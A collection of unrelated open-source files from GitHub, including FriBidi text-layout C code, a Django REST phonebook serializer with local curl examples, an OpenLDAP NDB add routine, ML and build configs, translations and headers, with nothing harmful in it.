return status ? j : -1;
}
/* Local array size, used for stack-based local arrays */
#define LOCAL_LIST_SIZE 128
static FriBidiFlags flags = FRIBIDI_FLAGS_DEFAULT | FRIBIDI_FLAGS_ARABIC;
FRIBIDI_ENTRY FriBidiLevel
fribidi_log2vis (
/* input */
const FriBidiChar *str,
const FriBidiStrIndex len,
/* input and output */
FriBidiParType *pbase_dir,
/* output */
FriBidiChar *visual_str,
FriBidiStrIndex *positions_L_to_V,
FriBidiStrIndex *positions_V_to_L,
FriBidiLevel *embedding_levels
)
{
register FriBidiStrIndex i;
FriBidiLevel max_level = 0;
fribidi_boolean private_V_to_L = false;
fribidi_boolean private_embedding_levels = false;
fribidi_boolean status = false;
FriBidiArabicProp local_ar_props[LOCAL_LIST_SIZE];
FriBidiArabicProp *ar_props = NULL;
FriBidiLevel local_embedding_levels[LOCAL_LIST_SIZE];
FriBidiCharType local_bidi_types[LOCAL_LIST_SIZE];
FriBidiCharType *bidi_types = NULL;
FriBidiBracketType local_bracket_types[LOCAL_LIST_SIZE];
FriBidiBracketType *bracket_types = NULL;
FriBidiStrIndex local_positions_V_to_L[LOCAL_LIST_SIZE];
if UNLIKELY
(len == 0)
{
status = true;
goto out;
}
DBG ("in fribidi_log2vis");
fribidi_assert (str);
fribidi_assert (pbase_dir);
if (len < LOCAL_LIST_SIZE)
bidi_types = local_bidi_types;
else
bidi_types = fribidi_malloc (len * sizeof bidi_types[0]);
if (!bidi_types)
goto out;
fribidi_get_bidi_types (str, len, bidi_types);
if (len < LOCAL_LIST_SIZE)
bracket_types = local_bracket_types;
else
bracket_types = fribidi_malloc (len * sizeof bracket_types[0]);
if (!bracket_types)
goto out;
fribidi_get_bracket_types (str, len, bidi_types,
/* output */
bracket_types);
if (!embedding_levels)
{
if (len < LOCAL_LIST_SIZE)
embedding_levels = local_embedding_levels;
else
embedding_levels = fribidi_malloc (len * sizeof embedding_levels[0]);
if (!embedding_levels)
goto out;
private_embedding_levels = true;
}
max_level = fribidi_get_par_embedding_levels_ex (bidi_types,
bracket_types,
len,
pbase_dir,
embedding_levels) - 1;
if UNLIKELY
(max_level < 0) goto out;
/* If l2v is to be calculated we must have v2l as well. If it is not
given by the caller, we have to make a private instance of it. */
if (positions_L_to_V && !positions_V_to_L)
{
if (len < LOCAL_LIST_SIZE)
positions_V_to_L = local_positions_V_to_L;
else
positions_V_to_L =
(FriBidiStrIndex *) fribidi_malloc (sizeof (FriBidiStrIndex) * len);
if (!positions_V_to_L)
goto out;
private_V_to_L = true;
}
/* Set up the ordering array to identity order */
if (positions_V_to_L)
{
for (i = 0; i < len; i++)
positions_V_to_L[i] = i;
}
if (visual_str)
{
/* Using memcpy instead
for (i = len - 1; i >= 0; i--)
visual_str[i] = str[i];
*/
memcpy (visual_str, str, len * sizeof (*visual_str));
/* Arabic joining */
if (len < LOCAL_LIST_SIZE)
ar_props = local_ar_props;
else
ar_props = fribidi_malloc (len * sizeof ar_props[0]);
fribidi_get_joining_types (str, len, ar_props);
fribidi_join_arabic (bidi_types, len, embedding_levels, ar_props);
fribidi_shape (flags, embedding_levels, len, ar_props, visual_str);
}
/* line breaking goes here, but we assume one line in this function */
/* and this should be called once per line, but again, we assume one
* line in this deprecated function */
status =
fribidi_reorder_line (flags, bidi_types, len, 0, *pbase_dir,
embedding_levels, visual_str,
positions_V_to_L);
/* Convert the v2l list to l2v */
if (positions_L_to_V)
{
for (i = 0; i < len; i++)
positions_L_to_V[i] = -1;
for (i = 0; i < len; i++)
positions_L_to_V[positions_V_to_L[i]] = i;
}
out:
if (private_V_to_L && positions_V_to_L != local_positions_V_to_L)
fribidi_free (positions_V_to_L);
if (private_embedding_levels && embedding_levels != local_embedding_levels)
fribidi_free (embedding_levels);
if (ar_props && ar_props != local_ar_props)
fribidi_free (ar_props);
if (bidi_types && bidi_types != local_bidi_types)
fribidi_free (bidi_types);
if (bracket_types && bracket_types != local_bracket_types)
fribidi_free (bracket_types);
return status ? max_level + 1 : 0;
}
const char *fribidi_unicode_version = FRIBIDI_UNICODE_VERSION;
const char *fribidi_version_info =
"(" FRIBIDI_NAME ") " FRIBIDI_VERSION "\n"
"interface version " FRIBIDI_INTERFACE_VERSION_STRING ",\n"
"Unicode Character Database version " FRIBIDI_UNICODE_VERSION ",\n"
"Configure options"
#ifdef DEBUG
" --enable-debug"
#endif /* DEBUG */
".\n\n"
"Copyright (C) 2004 Sharif FarsiWeb, Inc.\n"
"Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod\n"
"Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld\n"
FRIBIDI_NAME " comes with NO WARRANTY, to the extent permitted by law.\n"
"You may redistribute copies of " FRIBIDI_NAME " under\n"
"the terms of the GNU Lesser General Public License.\n"
"For more information about these matters, see the file named COPYING.\n\n"
"Written by Behdad Esfahbod and Dov Grobgeld.\n";
/* Editor directions:
* vim:textwidth=78:tabstop=8:shiftwidth=2:autoindent:cindent
*/
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
#
# Newfies-Dialer License
# http://www.newfies-dialer.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2015 Star2Billing S.L.
#
# The primary maintainer of this project is
# Arezqui Belaid <[email protected]>
#
from rest_framework import serializers
from dialer_contact.models import Phonebook
class PhonebookSerializer(serializers.HyperlinkedModelSerializer):
"""
**Create**:
CURL Usage::
curl -u username:password --dump-header - -H "Content-Type:application/json" -X POST --data '{"name": "myphonebook"}' http://localhost:8000/rest-api/phonebook/
Response::
HTTP/1.0 201 CREATED
Date: Fri, 14 Jun 2013 09:52:27 GMT
Server: WSGIServer/0.1 Python/2.7.3
Vary: Accept, Accept-Language, Cookie
Content-Type: application/json; charset=utf-8
Content-Language: en-us
Allow: GET, POST, HEAD, OPTIONS
**Read**:
CURL Usage::
curl -u username:password -H 'Accept: application/json' http://localhost:8000/rest-api/phonebook/
curl -u username:password -H 'Accept: application/json' http://localhost:8000/rest-api/phonebook/%phonebook-id%/
Response::
{
"count": 1,
"next": null,
"previous": null,
"results": [
{
"url": "http://127.0.0.1:8000/rest-api/phonebook/1/",
"name": "Default_Phonebook",
"description": "",
"user": "http://127.0.0.1:8000/rest-api/users/1/",
"created_date": "2011-04-08T07:55:05",
"updated_date": "2011-04-08T07:55:05"
}
]
}
**Update**:
CURL Usage::
curl -u username:password --dump-header - -H "Content-Type: application/json" -X PATCH --data '{"name": "mylittle phonebook"}' http://localhost:8000/rest-api/phonebook/%phonebook-id%/
Response::
HTTP/1.0 200 NO CONTENT
Date: Fri, 23 Sep 2011 06:46:12 GMT
Server: WSGIServer/0.1 Python/2.7.1+
Vary: Accept-Language, Cookie
Content-Length: 0
Content-Type: text/html; charset=utf-8
Content-Language: en-us
**Delete**:
CURL Usage::
curl -u username:password --dump-header - -H "Content-Type: application/json" -X DELETE http://localhost:8000/rest-api/phonebook/%phonebook-id%/
"""
user = serializers.Field(source='user')
class Meta:
model = Phonebook
| {
"pile_set_name": "Github"
} |
invitations.header.label=\u9080\u8ACB
invitations.accept.label=\u63A5\u53D7
invitations.members.label=\u6210\u54E1
invitations.space.label=\u7A7A\u9593
invitations.public.label=\u516C\u958B
invitations.private.label=\u79C1\u4EBA
| {
"pile_set_name": "Github"
} |
********************************************************************
* The original ffamber ports were written by Eric J. Sorin, *
* CSU Long Beach, Dept. of Chem & Biochem, and have now been *
* integrated with the standard gromacs distribution. *
* (Please don't blame Eric for errors we might have introduced.) *
* For the implementation/validation, please read/cite: *
* Sorin & Pande (2005). Biophys. J. 88(4), 2472-2493. *
* For related material and updates, please consult *
* http://chemistry.csulb.edu/ffamber/ *
********************************************************************
#define _FF_AMBER
#define _FF_AMBER96
[ defaults ]
; nbfunc comb-rule gen-pairs fudgeLJ fudgeQQ
1 2 yes 0.5 0.8333
#include "ffnonbonded.itp"
#include "ffbonded.itp"
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"filename" : "v-throbber.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
<?php
/*
* This file is part of the Prophecy.
* (c) Konstantin Kudryashov <[email protected]>
* Marcello Duarte <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Prophecy\Exception\Prediction;
use RuntimeException;
/**
* Basic failed prediction exception.
* Use it for custom prediction failures.
*
* @author Konstantin Kudryashov <[email protected]>
*/
class FailedPredictionException extends RuntimeException implements PredictionException
{
}
| {
"pile_set_name": "Github"
} |
' <snippetlockinvoicepricing>
' Lock the invoice pricing
Dim lockInvoiceRequest As New LockInvoicePricingRequest() With {.InvoiceId = _invoiceId}
_serviceProxy.Execute(lockInvoiceRequest)
Console.WriteLine("Invoice pricing locked.")
' Update the price list
priceListItem.Amount = New Money(40D)
updatePriceListItem = New UpdateRequest() With {.Target = priceListItem}
_serviceProxy.Execute(updatePriceListItem)
Console.WriteLine("Price list updated.")
' </snippetlockinvoicepricing> | {
"pile_set_name": "Github"
} |
//
// SyncTest.h
// SharkORMTests
//
// Created by Adrian Herridge on 18/07/2018.
// Copyright © 2018 Adrian Herridge. All rights reserved.
//
#import "BaseTestCase.h"
@interface SyncTest : BaseTestCase
@end
| {
"pile_set_name": "Github"
} |
id: BUILDINGS.STONE_DEPOSIT
name: _ Stone Deposit
baseclass: nature.ResourceDeposit
radius: 0
cost: 0
cost_inactive: 0
size_x: 3
size_y: 3
inhabitants: 0
tooltip_text: null
tier: TIER.NATURE
buildingcosts: {}
components:
- SelectableComponent:
type: building
tabs: [ResourceDepositOverviewTab,]
enemy_tabs: [ResourceDepositOverviewTab,]
- HealthComponent: {maxhealth: 10}
- DepositComponent:
resources:
RES.STONE_DEPOSIT:
min_amount: 750
max_amount: 1250
- StorageComponent:
SlotsStorage:
slot_sizes: {RES.STONE_DEPOSIT: 1000000}
actionsets:
TIER.NATURE:
as_stonedeposit0:
| {
"pile_set_name": "Github"
} |
# model settings
model = dict(
type='SOLO',
pretrained='torchvision://resnet101',
backbone=dict(
type='ResNet',
depth=101,
num_stages=4,
out_indices=(0, 1, 2, 3), # C2, C3, C4, C5
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=0,
num_outs=5),
bbox_head=dict(
type='SOLOV2Head',
num_classes=81,
in_channels=256,
stacked_convs=4,
seg_feat_channels=256,
strides=[8, 8, 16, 32, 32],
scale_ranges=((1, 96), (48, 192), (96, 384), (192, 768), (384, 2048)),
sigma=0.2,
num_grids=[40, 36, 24, 16, 12],
cate_down_pos=0,
with_deform=False,
loss_ins=dict(
type='DiceLoss',
use_sigmoid=True,
loss_weight=3.0),
loss_cate=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
))
# training and testing settings
train_cfg = dict()
test_cfg = dict(
nms_pre=500,
score_thr=0.1,
mask_thr=0.5,
update_thr=0.05,
kernel='gaussian', # gaussian/linear
sigma=2.0,
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
dict(type='Resize',
img_scale=[(1333, 800), (1333, 768), (1333, 736),
(1333, 704), (1333, 672), (1333, 640)],
multiscale_mode='value',
keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=4,
workers_per_gpu=4,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[27, 33])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 36
device_ids = range(8)
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/solo_r101_3x'
load_from = None
resume_from = None
workflow = [('train', 1)]
| {
"pile_set_name": "Github"
} |
/*
* /MathJax/jax/input/MathML/entities/y.js
*
* Copyright (c) 2012 Design Science, Inc.
*
* Part of the MathJax library.
* See http://www.mathjax.org for details.
*
* Licensed under the Apache License, Version 2.0;
* you may not use this file except in compliance with the License.
*
* http://www.apache.org/licenses/LICENSE-2.0
*/
(function(a){MathJax.Hub.Insert(a.Parse.Entity,{YAcy:"\u042F",YIcy:"\u0407",YUcy:"\u042E",Yacute:"\u00DD",Ycirc:"\u0176",Ycy:"\u042B",Yuml:"\u0178",yacute:"\u00FD",yacy:"\u044F",ycirc:"\u0177",ycy:"\u044B",yicy:"\u0457",yucy:"\u044E",yuml:"\u00FF"});MathJax.Ajax.loadComplete(a.entityDir+"/y.js")})(MathJax.InputJax.MathML);
| {
"pile_set_name": "Github"
} |
3085 Clan Wolf in Exile Medium Tank Second Line
Thor Artillery Vehicle (Clan),1
Hachiman Fire Support Tank (Standard),2
Zephyr Hovertank (Standard),3
Bandit (C) Hovercraft Prime,4
Bandit Hovercraft Mk 2,5
Maxim Heavy Hover Transport (Standard),6
Chaparral Missile Artillery Tank (Standard),5
Garuda Heavy VTOL (Standard),4
Epona Pursuit Tank Prime,3
Hachiman Fire Support Tank (Standard),2
Enyo Strike Tank (Standard),1
| {
"pile_set_name": "Github"
} |
import sys
if sys.version_info < (3, 7):
from ._marker import Marker
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(__name__, [], ["._marker.Marker"])
| {
"pile_set_name": "Github"
} |
/* add.cpp - ldap NDB back-end add routine */
/* $OpenLDAP$ */
/* This work is part of OpenLDAP Software <http://www.openldap.org/>.
*
* Copyright 2008-2020 The OpenLDAP Foundation.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted only as authorized by the OpenLDAP
* Public License.
*
* A copy of this license is available in the file LICENSE in the
* top-level directory of the distribution or, alternatively, at
* <http://www.OpenLDAP.org/license.html>.
*/
/* ACKNOWLEDGEMENTS:
* This work was initially developed by Howard Chu for inclusion
* in OpenLDAP Software. This work was sponsored by MySQL.
*/
#include "portable.h"
#include <stdio.h>
#include <ac/string.h>
#include "back-ndb.h"
extern "C" int
ndb_back_add(Operation *op, SlapReply *rs )
{
struct ndb_info *ni = (struct ndb_info *) op->o_bd->be_private;
Entry p = {0};
Attribute poc;
char textbuf[SLAP_TEXT_BUFLEN];
size_t textlen = sizeof textbuf;
AttributeDescription *children = slap_schema.si_ad_children;
AttributeDescription *entry = slap_schema.si_ad_entry;
NdbArgs NA;
NdbRdns rdns;
struct berval matched;
struct berval pdn, pndn;
int num_retries = 0;
int success;
LDAPControl **postread_ctrl = NULL;
LDAPControl *ctrls[SLAP_MAX_RESPONSE_CONTROLS];
int num_ctrls = 0;
Debug(LDAP_DEBUG_ARGS, "==> " LDAP_XSTRING(ndb_back_add) ": %s\n",
op->oq_add.rs_e->e_name.bv_val, 0, 0);
ctrls[num_ctrls] = 0;
NA.txn = NULL;
/* check entry's schema */
rs->sr_err = entry_schema_check( op, op->oq_add.rs_e, NULL,
get_relax(op), 1, NULL, &rs->sr_text, textbuf, textlen );
if ( rs->sr_err != LDAP_SUCCESS ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": entry failed schema check: "
"%s (%d)\n", rs->sr_text, rs->sr_err, 0 );
goto return_results;
}
/* add opattrs to shadow as well, only missing attrs will actually
* be added; helps compatibility with older OL versions */
rs->sr_err = slap_add_opattrs( op, &rs->sr_text, textbuf, textlen, 1 );
if ( rs->sr_err != LDAP_SUCCESS ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": entry failed op attrs add: "
"%s (%d)\n", rs->sr_text, rs->sr_err, 0 );
goto return_results;
}
/* Get our NDB handle */
rs->sr_err = ndb_thread_handle( op, &NA.ndb );
/*
* Get the parent dn and see if the corresponding entry exists.
*/
if ( be_issuffix( op->o_bd, &op->oq_add.rs_e->e_nname ) ) {
pdn = slap_empty_bv;
pndn = slap_empty_bv;
} else {
dnParent( &op->ora_e->e_name, &pdn );
dnParent( &op->ora_e->e_nname, &pndn );
}
p.e_name = op->ora_e->e_name;
p.e_nname = op->ora_e->e_nname;
op->ora_e->e_id = NOID;
rdns.nr_num = 0;
NA.rdns = &rdns;
if( 0 ) {
retry: /* transaction retry */
NA.txn->close();
NA.txn = NULL;
if ( op->o_abandon ) {
rs->sr_err = SLAPD_ABANDON;
goto return_results;
}
ndb_trans_backoff( ++num_retries );
}
NA.txn = NA.ndb->startTransaction();
rs->sr_text = NULL;
if( !NA.txn ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": startTransaction failed: %s (%d)\n",
NA.ndb->getNdbError().message, NA.ndb->getNdbError().code, 0 );
rs->sr_err = LDAP_OTHER;
rs->sr_text = "internal error";
goto return_results;
}
/* get entry or parent */
NA.e = &p;
NA.ocs = NULL;
rs->sr_err = ndb_entry_get_info( op, &NA, 0, &matched );
switch( rs->sr_err ) {
case 0:
rs->sr_err = LDAP_ALREADY_EXISTS;
goto return_results;
case LDAP_NO_SUCH_OBJECT:
break;
#if 0
case DB_LOCK_DEADLOCK:
case DB_LOCK_NOTGRANTED:
goto retry;
#endif
case LDAP_BUSY:
rs->sr_text = "ldap server busy";
goto return_results;
default:
rs->sr_err = LDAP_OTHER;
rs->sr_text = "internal error";
goto return_results;
}
if ( NA.ocs ) {
int i;
for ( i=0; !BER_BVISNULL( &NA.ocs[i] ); i++ );
poc.a_numvals = i;
poc.a_desc = slap_schema.si_ad_objectClass;
poc.a_vals = NA.ocs;
poc.a_nvals = poc.a_vals;
poc.a_next = NULL;
p.e_attrs = &poc;
}
if ( ber_bvstrcasecmp( &pndn, &matched ) ) {
rs->sr_matched = matched.bv_val;
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": parent "
"does not exist\n", 0, 0, 0 );
rs->sr_text = "parent does not exist";
rs->sr_err = LDAP_NO_SUCH_OBJECT;
if ( p.e_attrs && is_entry_referral( &p )) {
is_ref: p.e_attrs = NULL;
ndb_entry_get_data( op, &NA, 0 );
rs->sr_ref = get_entry_referrals( op, &p );
rs->sr_err = LDAP_REFERRAL;
rs->sr_flags = REP_REF_MUSTBEFREED;
attrs_free( p.e_attrs );
p.e_attrs = NULL;
}
goto return_results;
}
p.e_name = pdn;
p.e_nname = pndn;
rs->sr_err = access_allowed( op, &p,
children, NULL, ACL_WADD, NULL );
if ( ! rs->sr_err ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": no write access to parent\n",
0, 0, 0 );
rs->sr_err = LDAP_INSUFFICIENT_ACCESS;
rs->sr_text = "no write access to parent";
goto return_results;
}
if ( NA.ocs ) {
if ( is_entry_subentry( &p )) {
/* parent is a subentry, don't allow add */
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": parent is subentry\n",
0, 0, 0 );
rs->sr_err = LDAP_OBJECT_CLASS_VIOLATION;
rs->sr_text = "parent is a subentry";
goto return_results;
}
if ( is_entry_alias( &p ) ) {
/* parent is an alias, don't allow add */
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": parent is alias\n",
0, 0, 0 );
rs->sr_err = LDAP_ALIAS_PROBLEM;
rs->sr_text = "parent is an alias";
goto return_results;
}
if ( is_entry_referral( &p ) ) {
/* parent is a referral, don't allow add */
rs->sr_matched = p.e_name.bv_val;
goto is_ref;
}
}
rs->sr_err = access_allowed( op, op->ora_e,
entry, NULL, ACL_WADD, NULL );
if ( ! rs->sr_err ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": no write access to entry\n",
0, 0, 0 );
rs->sr_err = LDAP_INSUFFICIENT_ACCESS;
rs->sr_text = "no write access to entry";
goto return_results;;
}
/*
* Check ACL for attribute write access
*/
if (!acl_check_modlist(op, op->ora_e, op->ora_modlist)) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(bdb_add) ": no write access to attribute\n",
0, 0, 0 );
rs->sr_err = LDAP_INSUFFICIENT_ACCESS;
rs->sr_text = "no write access to attribute";
goto return_results;;
}
/* acquire entry ID */
if ( op->ora_e->e_id == NOID ) {
rs->sr_err = ndb_next_id( op->o_bd, NA.ndb, &op->ora_e->e_id );
if( rs->sr_err != 0 ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": next_id failed (%d)\n",
rs->sr_err, 0, 0 );
rs->sr_err = LDAP_OTHER;
rs->sr_text = "internal error";
goto return_results;
}
}
if ( matched.bv_val )
rdns.nr_num++;
NA.e = op->ora_e;
/* dn2id index */
rs->sr_err = ndb_entry_put_info( op->o_bd, &NA, 0 );
if ( rs->sr_err ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": ndb_entry_put_info failed (%d)\n",
rs->sr_err, 0, 0 );
rs->sr_text = "internal error";
goto return_results;
}
/* id2entry index */
rs->sr_err = ndb_entry_put_data( op->o_bd, &NA );
if ( rs->sr_err ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": ndb_entry_put_data failed (%d) %s(%d)\n",
rs->sr_err, NA.txn->getNdbError().message, NA.txn->getNdbError().code );
rs->sr_text = "internal error";
goto return_results;
}
/* post-read */
if( op->o_postread ) {
if( postread_ctrl == NULL ) {
postread_ctrl = &ctrls[num_ctrls++];
ctrls[num_ctrls] = NULL;
}
if ( slap_read_controls( op, rs, op->oq_add.rs_e,
&slap_post_read_bv, postread_ctrl ) )
{
Debug( LDAP_DEBUG_TRACE,
"<=- " LDAP_XSTRING(ndb_back_add) ": post-read "
"failed!\n", 0, 0, 0 );
if ( op->o_postread & SLAP_CONTROL_CRITICAL ) {
/* FIXME: is it correct to abort
* operation if control fails? */
goto return_results;
}
}
}
if ( op->o_noop ) {
if (( rs->sr_err=NA.txn->execute( NdbTransaction::Rollback,
NdbOperation::AbortOnError, 1 )) != 0 ) {
rs->sr_text = "txn (no-op) failed";
} else {
rs->sr_err = LDAP_X_NO_OPERATION;
}
} else {
if(( rs->sr_err=NA.txn->execute( NdbTransaction::Commit,
NdbOperation::AbortOnError, 1 )) != 0 ) {
rs->sr_text = "txn_commit failed";
} else {
rs->sr_err = LDAP_SUCCESS;
}
}
if ( rs->sr_err != LDAP_SUCCESS && rs->sr_err != LDAP_X_NO_OPERATION ) {
Debug( LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": %s : %s (%d)\n",
rs->sr_text, NA.txn->getNdbError().message, NA.txn->getNdbError().code );
rs->sr_err = LDAP_OTHER;
goto return_results;
}
NA.txn->close();
NA.txn = NULL;
Debug(LDAP_DEBUG_TRACE,
LDAP_XSTRING(ndb_back_add) ": added%s id=%08lx dn=\"%s\"\n",
op->o_noop ? " (no-op)" : "",
op->oq_add.rs_e->e_id, op->oq_add.rs_e->e_dn );
rs->sr_text = NULL;
if( num_ctrls ) rs->sr_ctrls = ctrls;
return_results:
success = rs->sr_err;
send_ldap_result( op, rs );
slap_graduate_commit_csn( op );
if( NA.txn != NULL ) {
NA.txn->execute( Rollback );
NA.txn->close();
}
if( postread_ctrl != NULL && (*postread_ctrl) != NULL ) {
slap_sl_free( (*postread_ctrl)->ldctl_value.bv_val, op->o_tmpmemctx );
slap_sl_free( *postread_ctrl, op->o_tmpmemctx );
}
return rs->sr_err;
}
| {
"pile_set_name": "Github"
} |
# SOME DESCRIPTIVE TITLE.
# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER
# This file is distributed under the same license as the PACKAGE package.
#
# Translators:
# shuhei hirota, 2019
# Tri Minh <[email protected]>, 2019
# 溝江 智徳 <[email protected]>, 2019
msgid ""
msgstr ""
"Project-Id-Version: Wagtail\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2020-08-03 18:03+0100\n"
"PO-Revision-Date: 2020-07-24 16:52+0000\n"
"Last-Translator: Matt Westcott <[email protected]>\n"
"Language-Team: Japanese (http://www.transifex.com/torchbox/wagtail/language/"
"ja/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Language: ja\n"
"Plural-Forms: nplurals=1; plural=0;\n"
#, python-format
msgid "Editing %(setting_type_name)s - %(instance)s"
msgstr "%(setting_type_name)s - %(instance)s を編集"
msgid "Editing"
msgstr "編集中"
msgid "Saving…"
msgstr "保存中"
msgid "Save"
msgstr "保存"
msgid "Settings"
msgstr "設定"
msgid "This setting could not be opened because there is no site defined."
msgstr "サイトが定義されていないため、この設定を開けません。"
msgid "The setting could not be saved due to errors."
msgstr "エラーが発生したため、サイトを保存できませんでした。"
| {
"pile_set_name": "Github"
} |
---
id: version-5.3.0-extension
title: Extension
sidebar_label: Extension
original_id: extension
---
Extensions allow you to listen to specific events in the application or request/response lifecycle. You have to register an extension before the event is triggered otherwise the event is lost.
## Server & Client lifecycle
```js
hemera.ext('onClientPreRequest', function(hemera, next) {
// some code
next()
})
hemera.ext('onClientPostRequest', function(hemera, next) {
// some code
next()
})
hemera.ext('onServerPreHandler', function(hemera, request, reply, next) {
// some code
next()
})
hemera.ext('onServerPreRequest', function(hemera, request, reply, next) {
// some code
next()
})
hemera.ext('onServerPreResponse', function(hemera, request, reply, next) {
// some code
next()
})
```
## Application lifecycle
```js
hemera.ext('onClose', (hemera, done) => {
// some code
done()
})
hemera.ext('onAdd', addDefinition => {
// some code
addDefinition.pattern
addDefinition.schema
addDefinition.action
addDefinition.transport
})
```
## Async / Await
You can also pass an async function.
```js
hemera.ext('onServerPreHandler', async function(hemera, request, reply) {
// some code
})
hemera.ext('onClientPreRequest', async function(hemera) {
// some code
})
```
| {
"pile_set_name": "Github"
} |
{
"name": "Oracle-Application-Server",
"author": "fofa",
"version": "0.1.0",
"matches": [
{
"search": "headers",
"text": "Oracle-Application-Server"
}
]
} | {
"pile_set_name": "Github"
} |
include_rules = [
"+third_party/khronos",
"+third_party/skia",
"+ui/events",
"+ui/base/x",
"+ui/gfx",
]
specific_include_rules = {
# This is the only target that should use the osmesa.h header. Everything else
# should use the GLES2 headers from third_party/khronos/ or use gl_bindings.h to
# get access to desktop OpenGL.
"gl_surface_osmesa.cc": [
"+third_party/mesa/src/include/GL/osmesa.h",
],
# Allow us to include ANGLE's base platform implementation.
"angle_platform_impl.h": [
"+third_party/angle/include/platform/Platform.h",
],
}
| {
"pile_set_name": "Github"
} |
version: "build-{branch}-{build}"
image: Visual Studio 2017
clone_folder: c:\gopath\github.com\hashicorp\go-getter
environment:
GOPATH: c:\gopath
install:
- cmd: >-
echo %Path%
go version
go env
go get -d -v -t ./...
build_script:
- cmd: go test ./...
| {
"pile_set_name": "Github"
} |
/*
Simple DirectMedia Layer
Copyright (C) 1997-2014 Sam Lantinga <[email protected]>
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
*/
#include "../../SDL_internal.h"
#ifndef _SDL_uikitmodes_h
#define _SDL_uikitmodes_h
#include "SDL_uikitvideo.h"
typedef struct
{
UIScreen *uiscreen;
CGFloat scale;
} SDL_DisplayData;
typedef struct
{
UIScreenMode *uiscreenmode;
CGFloat scale;
} SDL_DisplayModeData;
extern SDL_bool UIKit_IsDisplayLandscape(UIScreen *uiscreen);
extern int UIKit_InitModes(_THIS);
extern void UIKit_GetDisplayModes(_THIS, SDL_VideoDisplay * display);
extern int UIKit_SetDisplayMode(_THIS, SDL_VideoDisplay * display, SDL_DisplayMode * mode);
extern void UIKit_QuitModes(_THIS);
#endif /* _SDL_uikitmodes_h */
/* vi: set ts=4 sw=4 expandtab: */
| {
